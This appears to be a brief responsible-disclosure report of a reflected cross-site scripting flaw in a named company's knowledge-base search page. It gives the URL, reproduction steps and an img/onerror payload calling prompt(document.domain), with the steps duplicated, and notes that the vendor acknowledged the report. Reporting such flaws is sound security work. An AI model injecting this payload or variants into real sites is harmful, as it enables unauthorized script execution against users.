Vulnerability: Reflected Cross Site Scripting XSS
Vuln URL: http://www.inflectra.com/Support/KnowledgeBase/List.aspx
Steps:
1. Browse URL -> http://www.inflectra.com/Support/KnowledgeBase/List.aspx
2. Input following payload script to search box
"><img src=: '"><img src=a onerror=prompt(document.domain);>
Vuln URL: http://www.inflectra.com/Support/KnowledgeBase/List.aspx
Steps:
1. Browse URL -> http://www.inflectra.com/Support/KnowledgeBase/List.aspx
2. Input following payload script to search box
"><img src=: '"><img src=a onerror=prompt(document.domain);>
Inflectra Team acknowledged me for disclosing security issues to them.
Check here -> https://www.inflectra.com/company/responsible-disclosure.aspx